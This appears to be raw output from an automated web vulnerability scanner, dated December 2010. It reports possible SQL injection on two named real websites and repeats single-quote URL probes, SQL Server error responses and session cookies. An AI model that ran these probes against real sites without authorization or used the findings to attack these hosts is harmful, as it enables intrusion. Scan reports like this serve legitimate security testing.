Location: https://login.techweb.com/cas/login?service=http%3A//www.informationweek.com/whitepaper/Security/Privacy/business-driven-access-management-and-governance-wp1288732221012&gateway=true
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 97

<HEAD><TITLE>302 Moved Temporarily</TITLE></HEAD> <H1>302 Moved Temporarily</H1><BODY> </BODY>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /pr_prlist'/PR120910_IPTV.htm HTTP/1.1
Host: www.pyr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:09:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Cache-control: private

<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /pr_prlist''/PR120910_IPTV.htm HTTP/1.1
Host: www.pyr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:09:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/rp_Can-Vod-Save-IPTV.htm HTTP/1.1
Host: www.pyr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:08:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 343
Content-Type: text/html
Cache-control: private

<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near the keyword 'Save'.</font> ...[SNIP]...
Request 2
GET /store''/rp_Can-Vod-Save-IPTV.htm HTTP/1.1
Host: www.pyr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:08:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/rp_Global-Mobile-Capex-Index.htm HTTP/1.1
Host: www.pyr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:09:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 344
Content-Type: text/html
Cache-control: private

<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Incorrect syntax near the keyword 'Index'.</font> ...[SNIP]...
Request 2
GET /store''/rp_Global-Mobile-Capex-Index.htm HTTP/1.1
Host: www.pyr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111949876; s_cc=true; ASPSESSIONIDQCSQBACR=OKJKIDJBIKJJEFFMEOBAFFDN; __utmz=1.1292111950.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111949874; __utma=1.169607110.1292111950.1292111950.1292111950.1; s_lv_s=First%20Visit; __utmc=1; __utmb=1;
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:09:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Cache-control: private

<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /myaccount'/register.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=AKMKIDJBABFALIMCHCJOHMOP; path=/
Cache-control: private

<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /myaccount''/register.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=HKMKIDJBKGANDLDNAPNDMHGM; path=/
Cache-control: private

<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /points'/item/101209.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=CDNKIDJBBJOELBDMNDNDMLKN; path=/
Cache-control: private

<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /points''/item/101209.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=DDNKIDJBMPHLDOFFCPGPGNHP; path=/
Cache-control: private

<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /points/item'/101209.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=KDNKIDJBAOBEGIEMGJCNDCAO; path=/
Cache-control: private

<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /points/item''/101209.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=LDNKIDJBAMNNOHHEKPPEBKOJ; path=/
Cache-control: private

<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /points'/item/111810.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=GENKIDJBHLGKOIPBOKFMPMHH; path=/
Cache-control: private

<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /points''/item/111810.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=HENKIDJBMEPJLEKNAKJMOMBM; path=/
Cache-control: private

<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /points/item'/111810.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=KENKIDJBDHKBNDLAFCLEHLJE; path=/
Cache-control: private

<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /points/item''/111810.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=LENKIDJBHPHPIDCANLHNFDBK; path=/
Cache-control: private

<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /points'/item/120110.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=FDNKIDJBOFFMKBFMOLEIKFFG; path=/
Cache-control: private

<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /points''/item/120110.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=GDNKIDJBOMPAGPAMGMMKIKFI; path=/
Cache-control: private

<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /points/item'/120110.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=ODNKIDJBGCBNNDMELKIAAOEI; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /points/item''/120110.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=PDNKIDJBCIGCGIOHNKFHOLNH; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/CIRGUATEMALA.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=FLMKIDJBIHICDKCBAPGOGKMA; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/CIRGUATEMALA.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=ILMKIDJBBDPMKJBNMFKEIFNN; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/CIRISRAEL.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=LIMKIDJBHNOPJJDIHOOKMNAJ; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/CIRISRAEL.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=NIMKIDJBGEBBAJNGJPDAFBMN; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/CIRPANAMA.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=NGMKIDJBBLHENDIHCMKHAHFK; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/CIRPANAMA.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=AHMKIDJBGEHIELFNLMPGAHBO; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/CIRSAUDIARABIA.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=IHMKIDJBDCEOIFKONOMDAGNL; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/CIRSAUDIARABIA.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=JHMKIDJBGDCAPKKPONJJFDKN; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/CIRVIETNAM.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:04:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=PJMKIDJBNLMCIFEOMCEKJAJC; path=/
Cache-control: private
<font face="Arial" size=2> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font> <p> <font face="Arial" size=2>Unclosed quotation mark before the character string ')'.</font> ...[SNIP]...
Request 2
GET /store''/CIRVIETNAM.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 2
HTTP/1.1 302 Object moved
Connection: close
Date: Sun, 12 Dec 2010 00:04:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /index.htm
Content-Length: 131
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=FKMKIDJBOJDOOFAHNFCPMPPM; path=/
Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/index.htm">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /store'/PREPMNGDSERV.htm HTTP/1.1
Host: www.pyramidresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response 1
HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sun, 12 Dec 2010 00:03:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 358
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQBACR=DFLKIDJBFHBBOCNPNLDKPNCA; path=/
Cache-control: private
